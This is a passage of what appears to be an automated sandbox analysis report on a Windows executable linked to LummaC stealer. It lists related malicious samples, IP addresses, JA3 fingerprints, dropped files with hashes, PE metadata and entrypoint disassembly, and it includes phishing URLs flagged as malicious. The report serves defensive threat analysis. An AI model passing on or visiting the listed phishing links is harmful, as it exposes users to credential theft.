                                                                                                                                                                                                                                                                    • 104.21.84.67
                                                                                                                                                                                                                                                                    QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    HIDE0RerES.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    Dqw8QFydEX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.112.1
                                                                                                                                                                                                                                                                    ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                    • 172.67.220.36
                                                                                                                                                                                                                                                                    order confirmation.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                    • 104.21.90.137
                                                                                                                                                                                                                                                                    Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                    • 172.67.177.134
                                                                                                                                                                                                                                                                    Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                    • 104.21.58.24
                                                                                                                                                                                                                                                                    SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    AKAMAI-ASUSHIDE0RerES.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                                                    https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=documentGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                    • 184.30.20.187
                                                                                                                                                                                                                                                                    18037.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                    • 23.208.128.109
                                                                                                                                                                                                                                                                    FW_ TBI Construction Company.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                    • 2.19.198.209
                                                                                                                                                                                                                                                                    elitebotnet.sh4.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                    • 104.86.46.42
                                                                                                                                                                                                                                                                    https://docs.google.com/presentation/d/e/2PACX-1vTBMx4bSFDj_B_GCJTdTqUpVgpLXyQPR3uFGYP9j81KKHswOSbzMWDM5ZByYtVAwpACe-iOzHmzehje/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                    • 23.44.104.237
                                                                                                                                                                                                                                                                    naukri-launcher 10.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                    • 104.77.222.99
                                                                                                                                                                                                                                                                    naukri-launcher 10.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                    • 104.77.222.99
                                                                                                                                                                                                                                                                    powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                    • 23.15.56.98
                                                                                                                                                                                                                                                                    x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                    • 23.44.156.92

                                                                                                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                    a0e9f5d64349fb13191bc781f81f42e1QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                                                    • 104.21.22.222
                                                                                                                                                                                                                                                                    • 104.21.96.1
                                                                                                                                                                                                                                                                    HIDE0RerES.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                                                    • 104.21.22.222
                                                                                                                                                                                                                                                                    • 104.21.96.1
                                                                                                                                                                                                                                                                    Dqw8QFydEX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                                                    • 104.21.22.222
                                                                                                                                                                                                                                                                    • 104.21.96.1
                                                                                                                                                                                                                                                                    SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                                                    • 104.21.22.222
                                                                                                                                                                                                                                                                    • 104.21.96.1
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                                                    • 104.21.22.222
                                                                                                                                                                                                                                                                    • 104.21.96.1
                                                                                                                                                                                                                                                                    Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                                                    • 104.21.22.222
                                                                                                                                                                                                                                                                    • 104.21.96.1
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                                                    • 104.21.22.222
                                                                                                                                                                                                                                                                    • 104.21.96.1
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                                                    • 104.21.22.222
                                                                                                                                                                                                                                                                    • 104.21.96.1
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                                                    • 104.21.22.222
                                                                                                                                                                                                                                                                    • 104.21.96.1
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                                                    • 104.21.22.222
                                                                                                                                                                                                                                                                    • 104.21.96.1
                                                                                                                                                                                                                                                                    37f463bf4616ecd445d4a1937da06e19PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    7VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    7VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70

                                                                                                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\3247.tmp.exeQQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\ScreenUpdateSync[1].exeQQx0tdFC0b.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3247.tmp.exe_fa873e4e5b91f895d56ffe5d4be43566d6fb4da4_95caefda_8cb56b6e-51a8-43cd-a270-8b5d2c825f57\Report.wer

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                                                        Entropy (8bit):0.9562623586080256
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:yqug5KY33fM0Ks1SnqBju3RzuiFCZ24IO8Ur3:Pug5KYnvKs1SnqBjgzuiFCY4IO8Ur3
                                                                                                                                                                                                                                                                        MD5:900814DC1528767E2CB92B572EA04AE7
                                                                                                                                                                                                                                                                        SHA1:87D268CBF5DFE4F651A3DC9987563231C3FA68E5
                                                                                                                                                                                                                                                                        SHA-256:8505C78EBA357D97CACBD2950B2DAF63CF8022F34F68519970808B5616429B5A
                                                                                                                                                                                                                                                                        SHA-512:C459D1C61602CA80CE80FE1BED5E475021CCC493E4671F4AE07816ED7C49713429DB51EC733B02FFF4816E700705BAF637EDBD05B40AD360E2D7A8F23345A68C
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.6.5.5.3.1.9.7.1.5.5.1.3.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.6.5.5.3.2.0.1.5.3.0.1.7.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.c.b.5.6.b.6.e.-.5.1.a.8.-.4.3.c.d.-.a.2.7.0.-.8.b.5.d.2.c.8.2.5.f.5.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.2.1.2.6.0.9.1.-.c.0.2.a.-.4.7.9.f.-.8.7.c.0.-.7.4.d.c.5.b.7.f.8.e.0.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.3.2.4.7...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.2.8.-.0.0.0.1.-.0.0.1.3.-.5.f.f.6.-.d.2.4.0.2.9.4.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.8.5.0.6.8.2.2.b.d.7.4.a.d.7.d.0.7.c.6.a.d.f.9.6.7.a.5.7.3.6.8.0.0.0.0.f.f.f.f.!.0.0.0.0.4.a.2.0.9.5.6.9.0.b.a.8.f.1.3.2.5.d.d.1.0.1.6.7.3.1.8.7.2.8.4.4.7.d.1.2.0.5.8.a.!.3.2.4.7...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.

                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A82.tmp.dmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Sat Dec 14 13:08:39 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):46074
                                                                                                                                                                                                                                                                        Entropy (8bit):2.552985577239147
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:JufrXarHAcjJAarOx1BeqX/NTX0TO/sxxySOV7TcrYhmUELC9qb:nrHAcjDyTBdPlKBkvlFElb
                                                                                                                                                                                                                                                                        MD5:4232E7AB0BAA416BBF0D9E5D5AE0B6A7
                                                                                                                                                                                                                                                                        SHA1:014DE9462DC3A6F911CC549C3E3F06247702689E
                                                                                                                                                                                                                                                                        SHA-256:4389414BB7DE8545017D62F6E6B214CAA6DA2F7854236ADB803BB297D92C414A
                                                                                                                                                                                                                                                                        SHA-512:8D7EE36602E915E6D53563C94D405F4C23F4E2397D14421C6012D33AFD3FDB3DDEB1744D2D2002D27443BFECD4D08B473B4D00AAE9447B0BB237646BBFA4642C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:MDMP..a..... .......W.]g............4...............H...........<.......t...(-..........`.......8...........T............A...r......................................................................................................eJ......\ ......GenuineIntel............T.......(...F.]g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER4B6E.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):8288
                                                                                                                                                                                                                                                                        Entropy (8bit):3.696441365578222
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:R6l7wVeJO0y6nq6YuK66gmfSZVdsX0pDO89b4Ysf2Im:R6lXJOp6q6Yb66gmfSbKX+4LfQ
                                                                                                                                                                                                                                                                        MD5:7934FD12A42CE2398D17B6EEF6EDEBD0
                                                                                                                                                                                                                                                                        SHA1:8DDC6BD3CFCA192A5F29B783A78D2101B3DC420B
                                                                                                                                                                                                                                                                        SHA-256:4B35CA25854E269A40941747C7735CDC1DA16CF876EAD464B3E31665E209FFCD
                                                                                                                                                                                                                                                                        SHA-512:93DB7480BE57F4C574011929EB727BAE848EC40766CE2D79AE5791BB21B9FBFA83CCEAAC71DFFE014092A5F97F2E81A9804506E770AF2FE3679874D7A1EA7844
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.7.6.<./.P.i.

                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER4BAD.tmp.xml

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4565
                                                                                                                                                                                                                                                                        Entropy (8bit):4.442135649513889
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:cvIwWl8zsyJg77aI9Ap0qWpW8VYPYm8M4JP9reFN6+q8LxCFLwzwfd:uIjfAI7ap0L7VrJ06PLwzwfd
                                                                                                                                                                                                                                                                        MD5:3E4DB4C1958EB19B3AD4B7E0D4A3125E
                                                                                                                                                                                                                                                                        SHA1:E4B2B22305FE9C7FB514554B1D8B10BBFD65568E
                                                                                                                                                                                                                                                                        SHA-256:D63758E4AD3F88FBBAE5A82EE908259C501E169D2E535EA64934F9BF8A4D8407
                                                                                                                                                                                                                                                                        SHA-512:37B8AD32139FAA97A48676EC3246CFFD08A98216A11287563B5D55C37FED776AA96E7D2B8B0BFAD1795762B38AE1E17B924E99DF9869C4509A43628252458ADA
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="630971" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\ScreenUpdateSync[1].exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\XIaCqh1vRm.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):361984
                                                                                                                                                                                                                                                                        Entropy (8bit):6.633746849794654
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:alAD8SHVttaSqqwtsdu2S6Vfit5Ak+zDwHEjYWZuNCUS:alAZfqqwtuu2nivABAkMWm6
                                                                                                                                                                                                                                                                        MD5:D88E2431ABAC06BDF0CD03C034B3E5E3
                                                                                                                                                                                                                                                                        SHA1:4A2095690BA8F1325DD10167318728447D12058A
                                                                                                                                                                                                                                                                        SHA-256:4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
                                                                                                                                                                                                                                                                        SHA-512:7AA5317DCDF4343F1789E462F4B5D3D23F58E28B97C8C55FC4B3295BF0C26CFB5349B0A3543B05D6AF8FA2BC77F488A5ECE5EAACEAF5211FA98230EA9B7F49A7
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                                                                        • Filename: QQx0tdFC0b.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........S...S...S.....f.R...M.t.M...M.e.G...M.s.=...tj..Z...S... ...M.z.R...M.d.R...M.a.R...RichS...........PE..L.....2e......................?.....\.............@...........................C.............................................l)..P.....B.0............................................................................................................text...l........................... ..`.rdata..L".......$..................@..@.data.....=..@...p... ..............@....rsrc...0.....B.....................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\3247.tmp.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\XIaCqh1vRm.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):361984
                                                                                                                                                                                                                                                                        Entropy (8bit):6.633746849794654
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:alAD8SHVttaSqqwtsdu2S6Vfit5Ak+zDwHEjYWZuNCUS:alAZfqqwtuu2nivABAkMWm6
                                                                                                                                                                                                                                                                        MD5:D88E2431ABAC06BDF0CD03C034B3E5E3
                                                                                                                                                                                                                                                                        SHA1:4A2095690BA8F1325DD10167318728447D12058A
                                                                                                                                                                                                                                                                        SHA-256:4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
                                                                                                                                                                                                                                                                        SHA-512:7AA5317DCDF4343F1789E462F4B5D3D23F58E28B97C8C55FC4B3295BF0C26CFB5349B0A3543B05D6AF8FA2BC77F488A5ECE5EAACEAF5211FA98230EA9B7F49A7
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                                                                        • Filename: QQx0tdFC0b.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........S...S...S.....f.R...M.t.M...M.e.G...M.s.=...tj..Z...S... ...M.z.R...M.d.R...M.a.R...RichS...........PE..L.....2e......................?.....\.............@...........................C.............................................l)..P.....B.0............................................................................................................text...l........................... ..`.rdata..L".......$..................@..@.data.....=..@...p... ..............@....rsrc...0.....B.....................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                                                                                                        Entropy (8bit):4.2987695735238685
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:mECqOEmWfd+WQFHy/9026ZTyaRsCDusBqD5dooi8lKSD6VJSRyh:bCsL6seqD5S3SWVARU
                                                                                                                                                                                                                                                                        MD5:A37069692E6830B6C4B6FD61BC0FB0FF
                                                                                                                                                                                                                                                                        SHA1:C89FBC1DE515A3FB257FBD6E5F04598362ED3C5D
                                                                                                                                                                                                                                                                        SHA-256:2B3F9E75E70B7D3E8FE568977D9DADBB4C10E5445F31ABDE9F35A7FB1DA2E017
                                                                                                                                                                                                                                                                        SHA-512:1A3BA5429ACCAC43272283CCE45049BAA66C8CC34F28C0A185D5332D6895E03EC2AC8B5E504ABDC7E5ED460C077DD31C17DC05F303F88C2E3169952DCECE7DDC
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:regfD...D....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmf..J)N.................................................................................................................................................................................................................................................................................................................................................~........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Entropy (8bit):6.9638026024068775
                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                        File name:XIaCqh1vRm.exe
                                                                                                                                                                                                                                                                        File size:429'568 bytes
                                                                                                                                                                                                                                                                        MD5:e94835b4d3d35d99400dfd68fe580197
                                                                                                                                                                                                                                                                        SHA1:fd0b6060e72be90a15c8681a01cccdf7d90df179
                                                                                                                                                                                                                                                                        SHA256:1141d5ceaf0e3cddc1e1980fb60dc53e94374c6c5e43185297a7a87feb42e9b3
                                                                                                                                                                                                                                                                        SHA512:ae0a8b14aa220b793d5cb0a7102d95c8995456a71eb0f7674467f2277eca378233d93fa5465bb0357bb07b001e2269270c7d71f0a7bfc998e164228dcb838379
                                                                                                                                                                                                                                                                        SSDEEP:6144:NbBD4jta2GFeW0QYdWT9xPzfjU8HfTQBbAzegv+i:Nbe5aB0fYxTFOAvJ
                                                                                                                                                                                                                                                                        TLSH:8994D003A2F0AD21F6B68B329D3AF3D82B3FF5615E34676E22545A5F09701E2C572712
                                                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........S...S...S.....f.R...M.t.M...M.e.G...M.s.=...tj..Z...S... ...M.z.R...M.d.R...M.a.R...RichS...........PE..L.....of...........

                                                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                                                        Icon Hash:46c7c30b0f4e0d19

                                                                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Entrypoint:0x40185c
                                                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                        Time Stamp:0x666FB898 [Mon Jun 17 04:16:24 2024 UTC]
                                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                                                        Import Hash:28289f2f7e0a533d999708a3ae088e0b

                                                                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                                        call 00007FB724D19896h
                                                                                                                                                                                                                                                                        jmp 00007FB724D15F1Dh
                                                                                                                                                                                                                                                                        mov edi, edi
                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                                                                        sub esp, 00000328h
                                                                                                                                                                                                                                                                        mov dword ptr [00456C18h], eax
                                                                                                                                                                                                                                                                        mov dword ptr [00456C14h], ecx
                                                                                                                                                                                                                                                                        mov dword ptr [00456C10h], edx
                                                                                                                                                                                                                                                                        mov dword ptr [00456C0Ch], ebx
                                                                                                                                                                                                                                                                        mov dword ptr [00456C08h], esi
                                                                                                                                                                                                                                                                        mov dword ptr [00456C04h], edi
                                                                                                                                                                                                                                                                        mov word ptr [00456C30h], ss
                                                                                                                                                                                                                                                                        mov word ptr [00456C24h], cs
                                                                                                                                                                                                                                                                        mov word ptr [00456C00h], ds
